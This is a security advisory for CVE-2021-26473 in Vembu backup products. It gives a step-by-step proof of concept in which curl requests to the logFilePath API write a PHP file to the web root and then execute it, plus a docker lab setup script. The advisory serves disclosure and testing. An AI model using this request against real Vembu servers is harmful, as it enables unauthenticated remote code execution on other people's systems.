Skip to the content.

CVE-2021-26473 - Unauthenticated arbitrary file upload and command execution in Vembu products

CVE CVE-2021-26473
Discovered by
(Additional) researcher(s)
Products
  • VembuBDR
  • VembuOffsiteDR
  • Other products in this family may also be effected
Versions
  • VembuBDR v4.2.0.1
  • VembuBDR v4.2.0
  • VembuBDR v4.1.0
  • VembuBDR v4.0.2
  • VembuBDR v4.0.1
  • VembuBDR v4.0.0
  • VembuBDR v3.9.1 Update1
  • VembuBDR v3.9.0 Update1
  • VembuBDR v3.9.0
  • VembuBDR v3.8.0
  • VembuBDR v3.7.0
  • VembuBDR v3.5.0.0
  • VembuOffsiteDR v4.2.0.1
  • VembuOffsiteDR v4.2.0
  • Other products and versions of products in this family may also be effected
Page author Frank Breedijk
CVSS Base Score

Summary

The http API located at /sgwebservice_o.php action logFilePath allows an attacker to write arbitrary files in the context of the web server process. THese files can then be executed remotely by calling the file via the web server

How to reproduce

Step 1:Start up a docker environment (see below)

Step 2: In a different terminal run the following command:

$ curl 'http://localhost:6060/sgwebservice_o.php?Action=logFilePath&path=./my_php_info.php&value=%3C%3Fphp%20phpinfo%28%29%20%3F%3E%0A'
 
<StoreGrid><Message Error="1" Message="Successfully written." Code="500" /></StoreGrid> 

Step 3: validate that a file was written:


$ docker exec VembuBDR4201 /bin/bash -c "cd /home/vembubdr/Vembu/VembuBDR/htmlgui;ls -l my_*;echo ---;cat my_*;echo ---"
-rw-r--r-- 1 www-data www-data 19 Feb 11 15:35 my_php_info.php
---
<?php phpinfo() ?>
---

Call the script to get command execution:

$ curl 'http://localhost:6060/my_php_info.php'
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; color: #222; font-family: sans-serif;}
pre {margin: 0; font-family: monospace;}
a:link {color: #009; text-decoration: none; background-color: #fff;}
a:hover {text-decoration: underline;}
table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
.center {text-align: center;}
.center table {margin: 1em auto; text-align: left;}
.center th {text-align: center !important;}
td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
th {position: sticky; top: 0; background: inherit;}
h1 {font-size: 150%;}
h2 {font-size: 125%;}
.p {text-align: left;}
.e {background-color: #ccf; width: 300px; font-weight: bold;}
.h {background-color: #99c; font-weight: bold;}
.v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}
.v i {color: #999;}
img {float: right; border: 0;}
hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}
</style>
<title>PHP 7.4.3 - phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
…

Impact

This vulnerability allows an attacker to upload an arbitrary file in the context of the web server and then execute it.

About the docker test environment.

In order to set up the docker test environment, we used the following script:

#!/bin/bash
 
# Network
if [[ $(docker network ls |grep vembu-netowrk |wc -l ) -lt 1 ]]; then
  docker network create --subnet=172.18.0.0/16 vembu-network
fi
 
# Start Database container
mkdir DB
while [[ $(docker ps -a |grep VembuDatabase|wc -l) -ge 1 ]]; do
  docker kill VembuDatabase
  docker rm VembuDatabase
  sleep 1
done
docker run --name VembuDatabase --network vembu-network --ip 172.18.0.2 -p 5432:5432 -d -e POSTGRES_PASSWORD=admin -e POSTGRES_USER=postgres -e POSTGRES_DB=SGDatabase -v  $PWD/DB:/vembu vembubdr/bdr-latest:psql-latest
 
# Wait for database port to open
echo -c "Waiting for database to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/5432" ; do 
  echo -c "."
  sleep 1; 
done
echo
 
# Start APP container
mkdir APP
while [[ $(docker ps -a |grep VembuBDR4201|wc -l) -ge 1 ]]; do
  docker kill VembuBDR4201
  docker rm VembuBDR4201
  sleep 1
done
 
docker run --name VembuBDR4201 --network vembu-network --ip 172.18.0.3 --add-host VembuDatabase:172.18.0.2 --privileged=true -i -t -d --device /dev/fuse --privileged -p 6060:6060 -p 32004:32004 -v $PWD/APP:/vembu vembubdr/bdr-latest:vembubdr-4201-u1
 
# Wait for app port to open
echo -c "Waiting for application to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/6060" ; do 
  echo -c "."
  sleep 1; 
done
echo